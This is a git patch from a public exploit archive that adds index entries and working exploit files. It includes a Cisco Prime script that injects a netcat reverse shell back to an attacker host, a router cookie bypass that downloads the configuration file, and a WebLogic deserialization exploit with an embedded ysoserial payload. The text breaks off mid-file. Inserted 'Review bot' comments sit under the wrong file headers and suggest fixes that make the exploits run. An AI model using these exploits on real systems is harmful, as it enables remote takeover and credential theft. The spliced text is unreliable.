From a92226f6ac8d8c19fbc720ea88eb73ae2caacdd8 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 29 Sep 2017 05:01:35 +0000 Subject: [PATCH] DB: 2017-09-29 14 new exploits DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC) Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit) Oracle WebLogic Server 10.3.6.0 - Java Deserialization Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection Roteador Wireless Intelbras WRN150 - Autentication Bypass Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection --- files.csv | 14 +++ platforms/hardware/remote/42888.sh | 28 +++++ platforms/hardware/webapps/42916.py | 31 +++++ platforms/java/remote/42806.py | 97 +++++++++++++++ platforms/linux/remote/41910.sh | 7 +- platforms/multiple/remote/42885.rb | 185 ++++++++++++++++++++++++++++ platforms/php/webapps/42380.txt | 46 +++++++ platforms/php/webapps/42889.txt | 113 +++++++++++++++++ platforms/php/webapps/42893.txt | 162 ++++++++++++++++++++++++ platforms/php/webapps/42894.txt | 89 +++++++++++++ platforms/php/webapps/42895.txt | 82 ++++++++++++ platforms/php/webapps/42919.txt | 37 ++++++ platforms/windows/dos/42917.py | 32 +++++ platforms/windows/local/42890.txt | 113 +++++++++++++++++ platforms/windows/local/42918.py | 68 ++++++++++ platforms/windows/webapps/42892.txt | 135 ++++++++++++++++++++ 16 files changed, 1236 insertions(+), 3 deletions(-) create mode 100755 platforms/hardware/remote/42888.sh create mode 100755 platforms/hardware/webapps/42916.py create mode 
100755 platforms/java/remote/42806.py create mode 100755 platforms/multiple/remote/42885.rb create mode 100755 platforms/php/webapps/42380.txt create mode 100755 platforms/php/webapps/42889.txt create mode 100755 platforms/php/webapps/42893.txt create mode 100755 platforms/php/webapps/42894.txt create mode 100755 platforms/php/webapps/42895.txt create mode 100755 platforms/php/webapps/42919.txt create mode 100755 platforms/windows/dos/42917.py create mode 100755 platforms/windows/local/42890.txt create mode 100755 platforms/windows/local/42918.py create mode 100755 platforms/windows/webapps/42892.txt
diff --git a/files.csv b/files.csv
index 042b8ba04..fb33ea662 100644
--- a/files.csv
+++ b/files.csv
@@ -5688,6 +5688,7 @@ id,file,description,date,author,platform,type,port
 42781,platforms/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos,0
 42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0
 42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
+42917,platforms/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9259,6 +9260,8 @@ id,file,description,date,author,platform,type,port
 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
 42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
 42777,platforms/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,windows,local,0
+42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0
+42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15732,6 +15735,7 @@ id,file,description,date,author,platform,type,port
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
+42885,platforms/multiple/remote/42885.rb,"LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)",2017-09-27,"James Fitts",multiple,remote,0
 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
 42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0
 42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
@@ -15861,6 +15865,8 @@ id,file,description,date,author,platform,type,port
 42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
 42790,platforms/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote,0
 42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
+42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
+42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38359,6 +38365,7 @@ id,file,description,date,author,platform,type,port
 42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
 42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
+42380,platforms/php/webapps/42380.txt,"Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps,0
 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
 42543,platforms/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,java,webapps,0
@@ -38586,3 +38593,10 @@ id,file,description,date,author,platform,type,port
 42802,platforms/php/webapps/42802.txt,"WordPress Plugin Hospital Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
 42884,platforms/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,multiple,webapps,0
 42805,platforms/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
+42889,platforms/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,php,webapps,0
+42892,platforms/windows/webapps/42892.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption",2017-09-28,hyp3rlinx,windows,webapps,0
+42893,platforms/php/webapps/42893.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure",2017-09-28,hyp3rlinx,php,webapps,0
+42894,platforms/php/webapps/42894.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery",2017-09-28,hyp3rlinx,php,webapps,0
+42895,platforms/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,php,webapps,0
+42916,platforms/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",hardware,webapps,0
+42919,platforms/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0
diff --git a/platforms/hardware/remote/42888.sh b/platforms/hardware/remote/42888.sh
new file mode 100755
index 000000000..87d365ef2
--- /dev/null
+++ b/platforms/hardware/remote/42888.sh
@@ -0,0 +1,28 @@
+# Exploit Title: Cisco Prime Collaboration Provisioning < 12.1 - ScriptMgr Servlet Authentication Bypass Remote Code Execution
+# Date: 09/27/2017
+# Exploit Author: Adam Brown
+# Vendor Homepage: https://cisco.com
+# Software Link: https://software.cisco.com/download/release.html?mdfid=286308336&softwareid=286289070&release=11.6&flowid=81443
+# Version: < 12.1
+# Tested on: Debian 8
+# CVE : 2017-6622
+# Reference: https://www.tenable.com/plugins/index.php?view=single&id=101531
+# Mitigation - Upgrade your Cisco Prime Collaboration Provisioning server to 12.1 or later.
+
+# Description - This vulnerability allows an unauthenticated attacker to execute arbitrary Java code on a system running Cisco Prime Collaboration Provisioning server < 12.1 via a scripttext parameter in the ScriptMgr page.
+
+# Usage: ./prime-shell.sh
+
+function encode() {
+ echo "$1" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'
+}
+
+TARGET=$1
+ATTACKER=$2
+PORT=$3
+
+BASH=$(encode "/bin/bash")
+COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f")
+SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});"
+
+curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT"
diff --git a/platforms/hardware/webapps/42916.py b/platforms/hardware/webapps/42916.py
new file mode 100755
index 000000000..f748791ee
--- /dev/null
+++ b/platforms/hardware/webapps/42916.py
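Review bot: The `# Usage: ./prime-shell.sh` comment names no arguments, yet the script reads `$1`, `$2` and `$3` unconditionally, so the placeholders appear to have been lost and a call with missing arguments still sends a request to an empty host; the comment should read `# Usage: ./prime-shell.sh <target> <attacker-host> <attacker-port>` and a guard such as `[ "$#" -eq 3 ] || { echo "usage: $0 TARGET ATTACKER PORT" >&2; exit 1; }` belongs above `TARGET=$1`. `curl -k` disables certificate validation against what is an HTTPS management interface, which deserves a one-line comment since readers may copy the flag without noticing. From the defensive side, the request shape on the last line — an unauthenticated GET to `/cupm/ScriptMgr` with `command=compile&language=bsh` — is what to alert on, and the only mitigation the file gives is the upgrade to 12.1 or later stated in the header.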
@@ -0,0 +1,31 @@
+# Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN
+150
+# Date: 28/09/2017
+# Exploit Author: Elber Tavares
+# Vendor Homepage: http://intelbras.com.br/
+# Version: Intelbras Wireless N 150 Mbps - WRN 150
+# Tested on: kali linux, windows 7, 8.1, 10
+For more info:
+
+http://whiteboyz.xyz/authentication-bypass-intelbras-wrn-150.html
+
+URL VULN: http://10.0.0.1/
+
+Download backup file:
+
+Payload: curl --cookie "Cookie=admin:language=pt"
+http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg
+
+
+
+PoC:
+
+#pip install requests
+from requests import get
+
+url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg"
+#url do backup
+header = {'Cookie': 'admin:language=pt'}
+#setando o cookie no header
+r = get(url, headers=header).text
+print(r)
diff --git a/platforms/java/remote/42806.py b/platforms/java/remote/42806.py
new file mode 100755
index 000000000..86dd4f6f2
--- /dev/null
+++ b/platforms/java/remote/42806.py
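Review bot: The file is indexed as `.py`, but the block from `For more info:` through `PoC:` is bare prose, so the interpreter raises a SyntaxError before `from requests import get` is ever reached; prefixing those lines with `#` or wrapping them in a triple-quoted string would make the file runnable as committed. The title line is also wrapped mid-word (`WRN` / `150` on separate lines, the second of which is not a comment), presumably by the submitting mail client, and should be rejoined into the header comment. The two Portuguese comments should be English for the index's readers: `# backup URL` and `# set the cookie in the request headers`. For defenders the page shows that the config download at `/cgi-bin/DownloadCfg/RouterCfm.cfg` is gated only by a cookie value, so requests to that path with no preceding login are the signal to log; the file gives no vendor-fix status.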
@@ -0,0 +1,97 @@ +# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution] +# Date: [27/09/2017] +# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot +# Vulnerability Author: FoxGloveSecurity +# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html] +# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0] +# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr] +# CVE : [CVE-2015-4852] + +''' +This exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send +Ping requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful. +Feel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as +this script will do it for you on the fly. + +Note: I tried to get a bash one liner reverse shell payload working but that did not work on my target for some reason. Please let me know if you get it working :) +''' + +#!/usr/bin/env python +import socket +import sys +import struct +from binascii import unhexlify + +print "\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit..." +print "[+]Here is the command:\n\t tcpdump -nni -e icmp[icmptype] == 8\n" + +if len(sys.argv) < 2: + print "\n[+]Please provide target IP and Port..." 
+ print "[+]Usage:\n\t ./weblogic_linuxPing.py " + sys.exit() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +server_address = (sys.argv[1], int(sys.argv[2])) +print '[+]Connecting to %s port %s' % server_address +sock.connect(server_address) + +#Send headers +headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' +print '[+]Sending\n"%s"' % headers +sock.sendall(headers) + +data = sock.recv(1024) +print >>sys.stderr, '\n[+]Received "%s"' % data + + +#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload. +#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length +chunk1='\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\
x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + + +#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out +#len(payload) is xxxx bytes +#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target. +#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload. + +#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :) +chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\
x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\
x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\
x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" + + +chunk3 = 